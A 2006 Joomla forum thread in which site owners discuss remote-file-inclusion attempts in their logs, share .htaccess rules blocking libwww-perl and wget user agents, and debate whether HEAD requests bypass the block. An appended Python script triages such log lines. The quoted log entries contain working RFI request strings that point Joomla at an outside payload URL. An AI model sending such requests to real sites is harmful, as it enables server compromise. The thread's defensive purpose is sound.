The Joomla! Forum ™



Post subject: Annoying IRC "hackers"
PostPosted: Mon Nov 20, 2006 2:13 am 
Somehow, I and most of the people running Joomla have started to get lines like these in our logs:

Code:
69.13.6.170 - - [20/Nov/2006:00:26:37 +0000] "GET /joomla/demo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.superlist.gen.tr/lol1.txt? HTTP/1.0" 200 167 "-" "libwww-perl/5.53"


This is part of a script to trigger your Joomla installation into working as part of some sort of IRC bot, made by an Argentinian who got his website closed due to phishing (nice guy, huh?).

For now I solved that issue by inserting these lines in my .htaccess file:

Code:
SetEnvIfNoCase User-Agent "^libwww-perl" no_perl
<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=no_perl
</Limit>


I read about another .htaccess way to block based on the request, but since I don't know of any real web browser based on libwww-perl, I decided to block such clients from accessing Joomla. You can also combine this with the .htaccess recommended at the top of the page.

_________________
Due to a HD failure my personal website is down... will try to get it back ASAP


Last edited by sirarthur on Mon Nov 20, 2006 2:21 am, edited 1 time in total.

 
PostPosted: Mon Nov 20, 2006 10:44 am 
Dear Sir,
Thank you for the code.
I have just pasted it in my .htaccess file
Regards,

_________________
http://www.enad.co.uk


Last edited by hilu on Tue Nov 21, 2006 10:11 am, edited 1 time in total.

 
PostPosted: Mon Nov 20, 2006 1:56 pm 
sirarthur wrote:
Somehow, I and most of the people running Joomla have started to get lines like these in our logs:

Quote:
69.13.6.170 - - [20/Nov/2006:00:26:37 +0000] "GET /joomla/demo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=[...]? HTTP/1.0" 200 167 "-" "libwww-perl/5.53"



Just an FYI: if the size of the returned page is 167 bytes, the user received a message like this:
Quote:
Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script.


No need to block those attempts, as they didn't do any harm anyway.

_________________
We may not be able to control the wind, but we can always adjust our sails


 
PostPosted: Mon Nov 20, 2006 2:11 pm 
Yes, you're right, that's exactly the die response to those attempts.
However, since someone may try with some other Perl script, I decided to close access to libwww-perl. I'm also considering restricting wget; the site is aimed at people, not scripts/bots.



 
PostPosted: Tue Nov 21, 2006 9:55 am 
Dear Sirarthur,
You are a hero... :)
For the first time ever in my life as a helpless subject of hack attempts, I felt happy after using your code. ;D
My sincere thanks to you.
My raw access log reads like this today:

82.165.177.145 - - [20/Nov/2006:09:21:47 -0800] "GET /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.superlist.gen.tr/lol1.txt? HTTP/1.1" 403 583 "-" "libwww-perl/5.79"

We want only human beings to use our site, not any scripts.
Kindly provide the other deny code you referred to for wget as well, please.
Regards,



Last edited by hilu on Tue Nov 21, 2006 10:11 am, edited 1 time in total.

 
PostPosted: Tue Nov 21, 2006 3:01 pm 
To deny any other user agent you just need to add two lines,

eg:
SetEnvIfNoCase User-Agent "^wget" no_wget

and then

Deny from env=no_wget

Adding this to the previous .htaccess will look like:

SetEnvIfNoCase User-Agent "^libwww-perl" no_perl
SetEnvIfNoCase User-Agent "^wget" no_wget

Order Allow,Deny
Allow from all
Deny from env=no_perl
Deny from env=no_wget



 
PostPosted: Wed Nov 22, 2006 2:46 am 
sirarthur wrote:
To deny any other user agent you just need to add two lines,

eg:
SetEnvIfNoCase User-Agent "^wget" no_wget

and then

Deny from env=no_wget

Adding this to the previous .htaccess will look like:

SetEnvIfNoCase User-Agent "^libwww-perl" no_perl
SetEnvIfNoCase User-Agent "^wget" no_wget
<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=no_perl
Deny from env=no_wget



I'm a little concerned about the syntax of the .htaccess code there and the fact that it seems to overly complicate the .htaccess to get the desired result.
It may also leave a loophole, considering it only seems to block GET and POST. Would a HEAD request on the URL execute the exploit?

Or is it designed to work on servers that don't have mod_rewrite?


 
PostPosted: Wed Nov 22, 2006 3:18 am 
HEAD doesn't output anything other than information about the size of the page requested.

HEAD request to my site and the response:

Quote:
Client request

HEAD / HTTP/1.1
Host: http://www.sirarthur.info
Accept: text/html, application/xhtml+xml; q=0
Connection: Close

Server response

HTTP/1.1 200 OK
Date: Wed, 22 Nov 2006 03:05:03 GMT
Server: Apache/2.0.58 (Win32) PHP/5.1.4
Last-Modified: Sat, 04 Nov 2006 23:16:45 GMT
ETag: "c968-84d-bd3fed0"
Accept-Ranges: bytes
Content-Length: 2125
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug


GET method, same page:

Quote:
Client request

GET / HTTP/1.1
Host: http://www.sirarthur.info
Accept: text/html, application/xhtml+xml; q=0
Connection: Close

Server response

HTTP/1.1 200 OK
Date: Wed, 22 Nov 2006 03:05:40 GMT
Server: Apache/2.0.58 (Win32) PHP/5.1.4
Last-Modified: Sat, 04 Nov 2006 23:16:45 GMT
ETag: "c968-84d-bd3fed0"
Accept-Ranges: bytes
Content-Length: 2125
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

SirArthur's Home Page

(... rest of the page's code...)

You can check your server's response at http://tagsoup.com/cookbook/http/get-head/

You're right, however, that it could be a loophole, since the page's code may be fully executed on a HEAD request. The problem is that without any output the script will not be able to know whether the exploit succeeded or not.
But it's an easy problem to solve as well; just add HEAD to the Limit tag:

_________________
Due to a HD failure my personal website is down... will try to get it back ASAP
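Added example (my own code, not anything posted in this thread): a Python triage script for Apache combined-format log lines like the ones quoted above. It flags every request whose mosConfig_absolute_path carries a URL, whatever the method or User-Agent, and labels the outcome: 403 means the .htaccess rule fired, a 200 of 167 bytes is Joomla's own "Illegal variable" rejection described earlier, and anything else needs a look at the host. The sample lines, IP addresses and payload host are constructed.

```python
import re

# Apache "combined" log line, the same shape as the lines quoted in this thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$'
)
# mosConfig_absolute_path should be a local path; a URL in it is a remote-file-inclusion attempt.
RFI_RE = re.compile(r'mosConfig_absolute_path=https?://', re.IGNORECASE)
# Byte count of the "Illegal variable ... passed to script" die() page (per the thread).
JOOMLA_GUARD_BYTES = 167

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """None if the request is not an RFI attempt, otherwise a triage label."""
    if not RFI_RE.search(entry["path"]):
        return None
    status = int(entry["status"])
    size = 0 if entry["bytes"] == "-" else int(entry["bytes"])
    if status == 403:
        return "blocked-by-webserver"
    if status == 200 and size == JOOMLA_GUARD_BYTES:
        return "rejected-by-joomla-globals-guard"
    # The request reached the application and got a normal-looking page back: either
    # register_globals is off and the parameter was ignored, or the include ran.
    return "REVIEW: %s returned %d with %d bytes" % (entry["method"], status, size)

def triage(lines):
    """Return (method, user-agent, label) for every RFI attempt in the log."""
    out = []
    for line in lines:
        entry = parse_line(line)
        if entry is not None:
            label = classify(entry)
            if label:
                out.append((entry["method"], entry["ua"], label))
    return out

# Constructed sample (documentation-range IPs, placeholder payload host); the
# third line shows why triage keys on the query string, not the User-Agent.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Nov/2006:00:26:37 +0000] "GET /index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://attacker.example/x.txt? HTTP/1.0" 200 167 "-" "libwww-perl/5.53"',
    '192.0.2.11 - - [21/Nov/2006:09:21:47 -0800] "GET /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://attacker.example/x.txt? HTTP/1.1" 403 583 "-" "libwww-perl/5.79"',
    '192.0.2.12 - - [22/Nov/2006:03:05:03 +0000] "GET /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://attacker.example/x.txt? HTTP/1.1" 200 2125 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '198.51.100.5 - - [22/Nov/2006:03:10:00 +0000] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 2125 "-" "Mozilla/5.0"',
]
```

A User-Agent filter only stops tools that announce themselves, which is why the script keys on the query string rather than the agent. On the HEAD question: Apache's documentation for <Limit> states that listing GET also restricts HEAD, but any method not listed stays unrestricted, so the Order/Allow/Deny lines cover every method only when placed outside a <Limit> section, as in the version of the snippet posted earlier without the Limit wrapper.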

